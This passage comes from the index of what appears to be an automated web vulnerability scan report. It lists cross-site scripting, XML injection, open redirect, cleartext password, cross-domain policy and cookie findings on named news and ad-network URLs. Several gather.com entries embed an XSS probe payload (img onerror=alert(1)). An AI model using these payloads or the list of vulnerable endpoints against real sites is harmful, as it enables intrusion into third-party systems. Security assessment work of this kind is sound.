4.269. http://tap.rubiconproject.com/partner/agent/rubicon/insight.js [cb parameter]

4.270. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_KFHtXV6PPxtDmPIBUxUED/view.html [[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter]

4.271. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4_KFHtXV6PPxtDmPIBUxUED/view.html [[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter]

4.272. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5nPIMRa2RErgj_SiOwKJhEXwW6CKnglhixFGYeVivba-oTLnOWMrlgH/view.html [%5BPlace%20Your%20Cache%20Buster%20ID%20here%5D&ASTPCT parameter]

4.273. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/iNIxevlHF5nPIMRa2RErgj_SiOwKJhEXwW6CKnglhixFGYeVivba-oTLnOWMrlgH/view.html [%5BPlace%20Your%20Cache%20Buster%20ID%20here%5D&ASTPCT parameter]

4.274. http://weathergang.washingtonpost.com/rest/conditions/20001j [jsonp parameter]

4.275. http://widgets.vodpod.com/javascripts/recent_videos.js [id parameter]

4.276. http://widgets.vodpod.com/javascripts/recent_videos.js [options[div_id] parameter]

4.277. http://widgets.vodpod.com/javascripts/recent_videos.js [options[div_id] parameter]

4.278. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce [REST URL parameter 1]

4.279. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce [REST URL parameter 1]

4.280. http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce [REST URL parameter 1]

4.281. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]

4.282. http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]

4.283. http://www.gather.com/a [REST URL parameter 1]

4.284. http://www.gather.com/a [REST URL parameter 1]

4.285. http://www.gather.com/favicon.ico [REST URL parameter 1]

4.286. http://www.gather.com/favicon.ico [REST URL parameter 1]

4.287. http://www.gather.com/global_andre.css [REST URL parameter 1]

4.288. http://www.gather.com/global_andre.css [REST URL parameter 1]

4.289. http://www.gather.com/login.action [REST URL parameter 1]

4.290. http://www.gather.com/login.action [REST URL parameter 1]

4.291. http://www.gather.com/login.action [beamBack parameter]

4.292. http://www.gather.com/login.action [beamBack parameter]

4.293. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/ [REST URL parameter 3]

4.294. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/ [name of an arbitrarily supplied request parameter]

4.295. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/ [name of an arbitrarily supplied request parameter]

4.296. http://www.geek.com/images/phpThumb.php [REST URL parameter 2]

4.297. http://www.geek.com/images/phpThumb.php [name of an arbitrarily supplied request parameter]

4.298. http://www.geek.com/images/phpThumb.php [src parameter]

4.299. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 1]

4.300. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 2]

4.301. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 3]

4.302. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 4]

4.303. http://www.geek.com/wp-content/plugins/digg-digg/css/diggdigg-style.css [REST URL parameter 5]

4.304. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1]

4.305. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2]

4.306. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 3]

4.307. http://www.geek.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 4]

4.308. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 1]

4.309. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 2]

4.310. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 3]

4.311. http://www.geek.com/wp-content/plugins/wp-polls/polls-js.js [REST URL parameter 4]

4.312. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 1]

4.313. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 2]

4.314. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 3]

4.315. http://www.geek.com/wp-content/themes/geek6/favicon.ico [REST URL parameter 4]

4.316. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 1]

4.317. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 2]

4.318. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 3]

4.319. http://www.geek.com/wp-content/themes/geek6/style.css [REST URL parameter 4]

4.320. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 1]

4.321. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 2]

4.322. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 3]

4.323. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 4]

4.324. http://www.geek.com/wp-content/themes/geek6/styles/redesign.css [REST URL parameter 5]

4.325. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]

4.326. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]

4.327. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]

4.328. http://www.geek.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]

4.329. http://www.geek.com/wp-includes/js/l10n.js [REST URL parameter 1]

4.330. http://www.geek.com/wp-includes/js/l10n.js [REST URL parameter 2]

4.331. http://www.geek.com/wp-includes/js/l10n.js [REST URL parameter 3]

4.332. http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html [name of an arbitrarily supplied request parameter]

4.333. http://www.huffingtonpost.com/ads/check_flights.php [name of an arbitrarily supplied request parameter]

4.334. http://www.huffingtonpost.com/ads/check_flights.php [spot parameter]

4.335. http://www.huffingtonpost.com/badge/badges_json_v2.php [cb parameter]

4.336. http://www.huffingtonpost.com/badge/badges_json_v2.php [gn parameter]

4.337. http://www.huffingtonpost.com/badge/badges_json_v2.php [sn parameter]

4.338. http://www.huffingtonpost.com/permalink-tracker.html [vertical parameter]

4.339. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [REST URL parameter 1]

4.340. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [REST URL parameter 1]

4.341. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [REST URL parameter 2]

4.342. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [REST URL parameter 3]

4.343. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [name of an arbitrarily supplied request parameter]

4.344. http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html [name of an arbitrarily supplied request parameter]

4.345. http://www.philly.com/philly/news/nation_world/121548659.html [name of an arbitrarily supplied request parameter]

4.346. http://www.philly.com/philly/news/nation_world/121548659.html [name of an arbitrarily supplied request parameter]

4.347. http://www.washingtonpost.com//vendor/survey-gizmo.jsp [pollID parameter]

4.348. http://www.washingtonpost.com//vendor/survey-gizmo.jsp [pollURL parameter]

4.349. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 10]

4.350. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 3]

4.351. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 4]

4.352. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 5]

4.353. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 6]

4.354. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 7]

4.355. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 8]

4.356. http://www.washingtonpost.com/rf/image_606w/WashingtonPost/Content/Blogs/blogpost/201105/Images/May%209/photos.jpg [REST URL parameter 9]

4.357. http://fw.adsafeprotected.com/rjss/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [Referer HTTP header]

4.358. http://a.collective-media.net/cmadj/idgt.slashgear/article_above [cli cookie]

4.359. http://a.collective-media.net/cmadj/ns.androidcentral/general [cli cookie]

4.360. http://a.collective-media.net/cmadj/ns.androidcentral/general/archive [cli cookie]

4.361. http://a.collective-media.net/cmadj/ns.knowyourmobile/general [cli cookie]

4.362. http://a.collective-media.net/cmadj/ns.slashgear/general [cli cookie]

4.363. http://a.collective-media.net/cmadj/q1.philly/news [cli cookie]

4.364. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

4.365. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

4.366. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.367. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

4.368. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

4.369. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

4.370. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

4.371. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

4.372. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

4.373. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

4.374. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

4.375. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

4.376. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

4.377. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [ZEDOIDA cookie]

4.378. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [ZEDOIDA cookie]

4.379. http://optimized-by.rubiconproject.com/a/8430/13646/27091-15.js [ruid cookie]

4.380. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]

4.381. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.382. http://seg.sharethis.com/partners.php [__stid cookie]

4.383. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None [meld_sess cookie]

4.384. http://tag.admeld.com/ad/iframe/593/tpm/300x250/None [meld_sess cookie]

4.385. http://tag.admeld.com/ad/iframe/593/tpm/300x250/below_fold [meld_sess cookie]

4.386. http://tag.admeld.com/ad/iframe/593/tpm/300x250/below_fold [meld_sess cookie]

4.387. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/above_fold [meld_sess cookie]

4.388. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/above_fold [meld_sess cookie]

4.389. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/default_criteo [meld_sess cookie]

4.390. http://tag.admeld.com/ad/iframe/607/salonmedia/160x600/default_criteo [meld_sess cookie]

4.391. http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo [meld_sess cookie]

4.392. http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo [meld_sess cookie]

4.393. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683 [meld_sess cookie]

4.394. http://tag.admeld.com/ad/iframe/610/unified/728x90/pmh_657143_29771683 [meld_sess cookie]

4.395. http://tag.admeld.com/ad/json [meld_sess cookie]

4.396. http://tag.contextweb.com/TagPublish/getad.aspx [V cookie]

4.397. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]

4.398. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]

5. Flash cross-domain policy

5.1. http://a.collective-media.net/crossdomain.xml

5.2. http://a.tribalfusion.com/crossdomain.xml

5.3. http://a1.interclick.com/crossdomain.xml

5.4. http://ad.afy11.net/crossdomain.xml

5.5. http://ad.amgdgt.com/crossdomain.xml

5.6. http://ad.doubleclick.net/crossdomain.xml

5.7. http://ad.media6degrees.com/crossdomain.xml

5.8. http://ad.turn.com/crossdomain.xml

5.9. http://ad.uk.doubleclick.net/crossdomain.xml

5.10. http://ad1.netshelter.net/crossdomain.xml

5.11. http://ad2.netshelter.net/crossdomain.xml

5.12. http://ad4.netshelter.net/crossdomain.xml

5.13. http://ads.pointroll.com/crossdomain.xml

5.14. http://ads.specificmedia.com/crossdomain.xml

5.15. http://adsfac.us/crossdomain.xml

5.16. http://adv.netshelter.net/crossdomain.xml

5.17. http://adx.adnxs.com/crossdomain.xml

5.18. http://afe.specificclick.net/crossdomain.xml

5.19. http://altfarm.mediaplex.com/crossdomain.xml

5.20. http://amch.questionmarket.com/crossdomain.xml

5.21. http://aperture.displaymarketplace.com/crossdomain.xml

5.22. http://api.search.live.net/crossdomain.xml

5.23. http://ar.voicefive.com/crossdomain.xml

5.24. http://as.casalemedia.com/crossdomain.xml

5.25. http://audit.303br.net/crossdomain.xml

5.26. http://b.scorecardresearch.com/crossdomain.xml

5.27. http://b.voicefive.com/crossdomain.xml

5.28. http://bcp.crwdcntrl.net/crossdomain.xml

5.29. http://beacon.videoegg.com/crossdomain.xml

5.30. http://bh.contextweb.com/crossdomain.xml

5.31. http://bs.serving-sys.com/crossdomain.xml

5.32. http://c.betrad.com/crossdomain.xml

5.33. http://c7.zedo.com/crossdomain.xml

5.34. http://cache.specificmedia.com/crossdomain.xml

5.35. http://cas.criteo.com/crossdomain.xml

5.36. http://cdn.eyewonder.com/crossdomain.xml

5.37. http://cdn.turn.com/crossdomain.xml

5.38. http://cdn4.eyewonder.com/crossdomain.xml

5.39. http://cms.quantserve.com/crossdomain.xml

5.40. http://core.videoegg.com/crossdomain.xml

5.41. http://d.tradex.openx.com/crossdomain.xml

5.42. http://d.xp1.ru4.com/crossdomain.xml

5.43. http://dar.youknowbest.com/crossdomain.xml

5.44. http://data.cmcore.com/crossdomain.xml

5.45. http://delivery.uat.247realmedia.com/crossdomain.xml

5.46. http://dg.specificclick.net/crossdomain.xml

5.47. http://dis.ny.us.criteo.com/crossdomain.xml

5.48. http://ds.serving-sys.com/crossdomain.xml

5.49. http://event.adxpose.com/crossdomain.xml

5.50. http://flash.qoof.com/crossdomain.xml

5.51. http://fw.adsafeprotected.com/crossdomain.xml

5.52. http://g-pixel.invitemedia.com/crossdomain.xml

5.53. http://hs.interpolls.com/crossdomain.xml

5.54. http://i.w55c.net/crossdomain.xml

5.55. http://ib.adnxs.com/crossdomain.xml

5.56. http://idcs.interclick.com/crossdomain.xml

5.57. http://idpix.media6degrees.com/crossdomain.xml

5.58. http://img.mediaplex.com/crossdomain.xml

5.59. http://imp.fetchback.com/crossdomain.xml

5.60. http://js.revsci.net/crossdomain.xml

5.61. http://l.betrad.com/crossdomain.xml

5.62. http://load.exelator.com/crossdomain.xml

5.63. http://loadm.exelator.com/crossdomain.xml

5.64. http://log30.doubleverify.com/crossdomain.xml

5.65. http://m.adnxs.com/crossdomain.xml

5.66. http://map.media6degrees.com/crossdomain.xml

5.67. http://media.fastclick.net/crossdomain.xml

5.68. http://metrics.philly.com/crossdomain.xml

5.69. http://metrics.washingtonpost.com/crossdomain.xml

5.70. http://mpd.mxptint.net/crossdomain.xml

5.71. http://o.sa.aol.com/crossdomain.xml

5.72. http://ping.crowdscience.com/crossdomain.xml

5.73. http://pix04.revsci.net/crossdomain.xml

5.74. http://pixel.invitemedia.com/crossdomain.xml

5.75. http://pixel.quantserve.com/crossdomain.xml

5.76. http://puma.vizu.com/crossdomain.xml

5.77. http://q1.checkm8.com/crossdomain.xml

5.78. http://r.turn.com/crossdomain.xml

5.79. http://s.meebocdn.net/crossdomain.xml

5.80. http://s0.2mdn.net/crossdomain.xml

5.81. http://s3.vpimg.net/crossdomain.xml

5.82. http://search.twitter.com/crossdomain.xml

5.83. http://secure-us.imrworldwide.com/crossdomain.xml

5.84. http://segment-pixel.invitemedia.com/crossdomain.xml

5.85. http://segments.adap.tv/crossdomain.xml

5.86. http://speed.pointroll.com/crossdomain.xml

5.87. http://stats.vodpod.com/crossdomain.xml

5.88. http://t.mookie1.com/crossdomain.xml

5.89. http://tags.bluekai.com/crossdomain.xml

5.90. http://track.qoof.com/crossdomain.xml

5.91. http://ttwbs.channelintelligence.com/crossdomain.xml

5.92. http://turn.nexac.com/crossdomain.xml

5.93. http://um.simpli.fi/crossdomain.xml

5.94. http://va.px.invitemedia.com/crossdomain.xml

5.95. http://www.huffingtonpost.com/crossdomain.xml

5.96. http://adadvisor.net/crossdomain.xml

5.97. http://ads.adbrite.com/crossdomain.xml

5.98. http://ads.adsonar.com/crossdomain.xml

5.99. http://ads.tw.adsonar.com/crossdomain.xml

5.100. http://ads2.adbrite.com/crossdomain.xml

5.101. http://adx.g.doubleclick.net/crossdomain.xml

5.102. http://api.tweetmeme.com/crossdomain.xml

5.103. http://bn.xp1.ru4.com/crossdomain.xml

5.104. http://bstats.adbrite.com/crossdomain.xml

5.105. http://cdn.shoutlet.com/crossdomain.xml

5.106. http://cim.meebo.com/crossdomain.xml

5.107. http://cookex.amp.yahoo.com/crossdomain.xml

5.108. http://disqus.com/crossdomain.xml

5.109. http://edge.sharethis.com/crossdomain.xml

5.110. http://feeds.bbci.co.uk/crossdomain.xml

5.111. http://googleads.g.doubleclick.net/crossdomain.xml

5.112. http://media.philly.com/crossdomain.xml

5.113. http://media.washingtonpost.com/crossdomain.xml

5.114. http://media3.washingtonpost.com/crossdomain.xml

5.115. http://media7.washingtonpost.com/crossdomain.xml

5.116. http://mm.chitika.net/crossdomain.xml

5.117. http://newsrss.bbc.co.uk/crossdomain.xml

5.118. http://optimized-by.rubiconproject.com/crossdomain.xml

5.119. http://pagead2.googlesyndication.com/crossdomain.xml

5.120. http://politics.gather.com/crossdomain.xml

5.121. http://pubads.g.doubleclick.net/crossdomain.xml

5.122. http://rd.meebo.com/crossdomain.xml

5.123. http://redux.com/crossdomain.xml

5.124. http://s26.sitemeter.com/crossdomain.xml

5.125. http://static.ak.fbcdn.net/crossdomain.xml

5.126. http://syndication.mmismm.com/crossdomain.xml

5.127. http://this.content.served.by.adshuffle.com/crossdomain.xml

5.128. http://tracking.adjug.com/crossdomain.xml

5.129. http://w.sharethis.com/crossdomain.xml

5.130. http://www.facebook.com/crossdomain.xml

5.131. http://www.gather.com/crossdomain.xml

5.132. http://www.meebo.com/crossdomain.xml

5.133. http://www.philly.com/crossdomain.xml

5.134. http://www.washingtonpost.com/crossdomain.xml

5.135. http://www.youtube.com/crossdomain.xml

5.136. http://api.twitter.com/crossdomain.xml

5.137. http://stats.wordpress.com/crossdomain.xml

5.138. http://talkingpointsmemo.com/crossdomain.xml

5.139. http://ultraedit.app7.hubspot.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad.uk.doubleclick.net/clientaccesspolicy.xml

6.3. http://ads.pointroll.com/clientaccesspolicy.xml

6.4. http://api.search.live.net/clientaccesspolicy.xml

6.5. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.6. http://b.voicefive.com/clientaccesspolicy.xml

6.7. http://cdn.eyewonder.com/clientaccesspolicy.xml

6.8. http://metrics.philly.com/clientaccesspolicy.xml

6.9. http://metrics.washingtonpost.com/clientaccesspolicy.xml

6.10. http://o.sa.aol.com/clientaccesspolicy.xml

6.11. http://s0.2mdn.net/clientaccesspolicy.xml

6.12. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

6.13. http://speed.pointroll.com/clientaccesspolicy.xml

6.14. http://stats.wordpress.com/clientaccesspolicy.xml

6.15. http://ts1.mm.bing.net/clientaccesspolicy.xml

6.16. http://ts2.mm.bing.net/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://www.gather.com/login.action

7.2. http://www.geek.com/articles/geek-pick/google-music-to-launch-in-beta-at-io-2011-20110510/

7.3. http://www.philly.com/philly/news/nation_world/121548659.html

7.4. http://www.philly.com/s

7.5. http://www.tlsubmit.com/affiliate_signup.html

7.6. http://www.tlsubmit.com/checkout/member.php

7.7. http://www.tlsubmit.com/checkout/signup.php

8. XML injection

8.1. http://174.129.88.248/partner.gif [REST URL parameter 1]

8.2. http://forum.androidcentral.com/external.php [type parameter]

8.3. http://id.washingtonpost.com/identity/public/visitor/create [format parameter]

8.4. http://load.exelator.com/load/ [REST URL parameter 1]

8.5. http://loadm.exelator.com/load/ [REST URL parameter 1]

8.6. http://pixel.quantserve.com/api/segments.json [REST URL parameter 1]

8.7. http://pixel.quantserve.com/api/segments.json [REST URL parameter 2]

8.8. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

8.9. http://platform.twitter.com/anywhere.js [REST URL parameter 1]

8.10. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.11. http://platform.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.12. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

8.13. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

8.14. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js [REST URL parameter 1]

8.15. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js [REST URL parameter 2]

8.16. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js [REST URL parameter 3]

8.17. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_8_0.en.js [REST URL parameter 1]

8.18. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_8_0.en.js [REST URL parameter 2]

8.19. http://s.meebocdn.net/cim/script/sandbox_v92_cim_11_8_0.en.js [REST URL parameter 3]

8.20. http://s3.vpimg.net/vodpod.com.videos.thumbnail/8045516.large.jpg [REST URL parameter 1]

8.21. http://s3.vpimg.net/vodpod.com.videos.thumbnail/8045516.large.jpg [REST URL parameter 2]

8.22. http://w55c.net/ct/cms-2-frame.html [REST URL parameter 1]

8.23. http://w55c.net/ct/cms-2-frame.html [REST URL parameter 2]

8.24. http://www.washingtonpost.com//vendor/survey-gizmo.jsp [REST URL parameter 1]

9. SSL cookie without secure flag set

9.1. https://secure.smartphoneexperts.com/content/customercare/page-status.htm

9.2. https://support.ccbill.com/

10. Session token in URL

10.1. http://api.echoenabled.com/v1/users/whoami

10.2. http://l.sharethis.com/pview

10.3. http://www.facebook.com/extern/login_status.php

11. Open redirection

11.1. http://ad.trafficmp.com/a/bpix [r parameter]

11.2. http://b.scorecardresearch.com/r [d.c parameter]

11.3. http://bh.contextweb.com/bh/rtset [rurl parameter]

11.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [ru parameter]

11.5. http://cmap.am.ace.advertising.com/amcm.ashx [admeld_callback parameter]

11.6. http://d.xp1.ru4.com/activity [redirect parameter]

11.7. http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9349/83989/BurstingPipe/adServer.bs [REST URL parameter 2]

11.8. http://fw.adsafeprotected.com/rfw/bs.serving-sys.com/9349/83990/BurstingPipe/adServer.bs [REST URL parameter 2]

11.9. http://i.w55c.net/ping_match.gif [rurl parameter]

11.10. http://sync.mathtag.com/sync/img [redir parameter]

11.11. http://tag.admeld.com/id [redirect parameter]

11.12. http://tags.bluekai.com/site/3561 [redir parameter]

11.13. http://xcdn.xgraph.net/17572/ae/xg.gif [n parameter]

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/statuses/user_timeline.json

12.2. http://contentnext.disqus.com/thread.js

12.3. http://id.trove.com/identity/public/visitor.json

12.4. http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/

12.5. http://politics.gather.com/viewArticle.action

12.6. http://slashgeardotcom.disqus.com/thread.js

12.7. http://t.mookie1.com/t/v1/imp

12.8. http://ttwbs.channelintelligence.com/

12.9. http://www.gather.com/6360d%3Cimg%20src%3da%20onerror%3dalert(1)%3E1b6979d15ce

12.10. http://www.tlsubmit.com/checkout/signup.php

12.11. http://a.tribalfusion.com/displayAd.js

12.12. http://a.tribalfusion.com/j.ad

12.13. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp

12.14. http://action.mathtag.com/mm/rtb/TREE/1101A0/imp

12.15. http://ad.afy11.net/ad

12.16. http://ad.amgdgt.com/ads/

12.17. http://ad.bnmla.com/serve

12.18. http://ad.media6degrees.com/adserv/cs

12.19. http://ad.media6degrees.com/adserv/csst

12.20. http://ad.trafficmp.com/a/bpix

12.21. http://ad.trafficmp.com/a/bpix

12.22. http://ad.trafficmp.com/a/js

12.23. http://ad.turn.com/server/ads.js

12.24. http://ad.turn.com/server/pixel.htm

12.25. http://admeld.lucidmedia.com/clicksense/admeld/match

12.26. http://ads.adbrite.com/adserver/behavioral-data/8203

12.27. http://ads.adbrite.com/adserver/vdi/684339

12.28. http://ads.adbrite.com/adserver/vdi/742697

12.29. http://ads.adbrite.com/adserver/vdi/762701

12.30. http://ads.adbrite.com/adserver/vdi/762701

12.31. http://ads.pointroll.com/PortalServe/

12.32. http://ads.revsci.net/adserver/ako

12.33. http://ads.revsci.net/adserver/ako

12.34. http://ads.revsci.net/adserver/ako

12.35. http://ads.revsci.net/adserver/ako

12.36. http://ads.revsci.net/adserver/ako

12.37. http://ads.revsci.net/adserver/ako

12.38. http://ads.revsci.net/adserver/ako

12.39. http://ads.revsci.net/adserver/ako

12.40. http://ads.shorttail.net/cgi-bin/ads/ad20135bg.cgi/v=2.3S/sz=1x1A/90673/NF/RETURN-CODE/JS/

12.41. http://ads.specificmedia.com/serve/v=5

12.42. http://ads2.adbrite.com/v0/ad

12.43. http://adx.adnxs.com/mapuid

12.44. http://afe.specificclick.net/

12.45. http://ak1.abmr.net/is/tag.admeld.com

12.46. http://ak1.abmr.net/is/tag.contextweb.com

12.47. http://altfarm.mediaplex.com/ad/bn/17550-128038-2754-3

12.48. http://altfarm.mediaplex.com/ad/fm/13305-124472-22136-1

12.49. http://amch.questionmarket.com/adsc/d887938/36/500004878102/adscout.php

12.50. http://api.bizographics.com/v1/profile.redirect

12.51. http://api.viglink.com/api/ping

12.52. http://ar.voicefive.com/b/wc_beacon.pli

12.53. http://ar.voicefive.com/bmx3/broker.pli

12.54. http://ar.voicefive.com/bmx3/broker.pli

12.55. http://as.casalemedia.com/j

12.56. http://as.casalemedia.com/j

12.57. http://as.casalemedia.com/s

12.58. http://b.scorecardresearch.com/b

12.59. http://b.scorecardresearch.com/p

12.60. http://b.scorecardresearch.com/r

12.61. http://b.voicefive.com/b

12.62. http://bcp.crwdcntrl.net/4/c=368|rand=317175907|genp=na

12.63. http://bcp.crwdcntrl.net/4/c=402%7Crand=271498847%7Cpv=y%7Casync=y%7Crt=ifr

12.64. http://bcp.crwdcntrl.net/4/c=402|rand=214441500|pv=y|async=y|rt=ifr

12.65. http://bcp.crwdcntrl.net/4/c=402|rand=286689202|pv=y|async=y|rt=ifr

12.66. http://bcp.crwdcntrl.net/4/c=402|rand=300411654|pv=y|async=y|rt=ifr

12.67. http://bcp.crwdcntrl.net/4/c=402|rand=344848627|pv=y|async=y|rt=ifr

12.68. http://bcp.crwdcntrl.net/4/c=402|rand=690730866|pv=y|async=y|rt=ifr

12.69. http://bcp.crwdcntrl.net/4/c=402|rand=827443052|pv=y|async=y|rt=ifr

12.70. http://bcp.crwdcntrl.net/4/c=402|rand=908408442|pv=y|async=y|rt=ifr

12.71. http://bh.contextweb.com/bh/rtset

12.72. http://bid.openx.net/json

12.73. http://bs.serving-sys.com/BurstingPipe/adServer.bs

12.74. http://bstats.adbrite.com/adserver/behavioral-data/0

12.75. http://bstats.adbrite.com/click/bstats.gif

12.76. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js

12.77. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

12.78. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js

12.79. http://c7.zedo.com/utils/ecSet.js

12.80. http://cas.criteo.com/delivery/admeld_map

12.81. http://cas.criteo.com/delivery/ajs.php

12.82. http://cdn4.eyewonder.com/cm/js/10295-119241-10420-6

12.83. http://cms.ad.yieldmanager.net/v1/cms

12.84. http://cms.quantserve.com/dpixel

12.85. http://cw-m.d.chango.com/m/cw

12.86. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/3658195966029417970

12.87. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775/mchpid/4/url/

12.88. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3658195966029417970

12.89. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/3658195966029417970/mchpid/4/url/

12.90. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/3658195966029417970

12.91. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/3658195966029417970

12.92. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

12.93. http://data.adsrvr.org/map/cookie/contextweb

12.94. http://dis.ny.us.criteo.com/dis/dis.aspx

12.95. http://forum.androidcentral.com/external.php

12.96. http://g-pixel.invitemedia.com/gmatcher

12.97. http://gather.us.intellitxt.com/intellitxt/front.asp

